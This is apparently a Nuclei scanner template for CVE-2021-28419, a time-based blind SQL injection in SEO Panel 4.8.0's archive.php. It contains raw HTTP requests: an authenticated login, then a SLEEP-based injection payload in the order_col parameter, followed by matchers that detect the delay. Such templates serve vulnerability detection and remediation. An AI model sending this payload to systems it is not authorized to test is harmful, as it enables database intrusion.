id: CVE-2021-28419 info: name: SEO Panel 4.8.0 - Blind SQL Injection author: theamanrawat severity: high description: | SEO Panel 4.8.0 is susceptible to time-based blind SQL injection via the order_col parameter in archive.php. An attacker can potentially retrieve all databases and thus obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. remediation: | Upgrade to a patched version of SEO Panel or apply the necessary security patches. reference: - https://github.com/seopanel/Seo-Panel/issues/209 - https://www.seopanel.org/spdownload/4.8.0 - https://nvd.nist.gov/vuln/detail/CVE-2021-28419 - http://packetstormsecurity.com/files/162322/SEO-Panel-4.8.0-SQL-Injection.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.2 cve-id: CVE-2021-28419 cwe-id: CWE-89 epss-score: 0.17236 epss-percentile: 0.95514 cpe: cpe:2.3:a:seopanel:seo_panel:4.8.0:*:*:*:*:*:*:* metadata: verified: true max-request: 3 vendor: seopanel product: seo_panel tags: cve,cve2021,sqli,seopanel,auth,packetstorm http: - raw: - | GET / HTTP/1.1 Host: {{Hostname}} Cookie: _csrf={{rand_base(54,"abc")}}; - | POST /login.php HTTP/1.1 Host: {{Hostname}} Origin: {{Hostname}} Content-Type: application/x-www-form-urlencoded Referer: {{BaseURL}}login.php Cookie: _csrf={{rand_base(54,"abc")}}; sec=login&red_referer=http%3A%2F%2F{{BaseURL}}&userName={{username}}&password={{password}}&login= - | GET /archive.php?from_time=2021-04-25&order_col=(SELECT+7397+FROM(SELECT(SLEEP(3)))test)&order_val=DESC&report_type=website-search-reports&search_name=&sec=viewWebsiteSearchSummary&to_time=2021-04-25&website_id= HTTP/1.1 Host: {{Hostname}} Cookie: _csrf={{rand_base(54,"abc")}}; cookie-reuse: true matchers: - type: dsl dsl: - 'duration_3>=6' - 'status_code_3 == 200' - 'contains(body_3, "Overall Report Summary")' condition: and # digest: 4a0a00473045022016d173a0bc91f0c26b3b6cac1e264666e4ef24dcaf931948d088be86c5f4889b02210081d48cd34f0ef2ae8183ba1701fdeab110b7ae242e6fa505fe8570b0da5e13a5:922c64590222798bb761d5b6d8e72950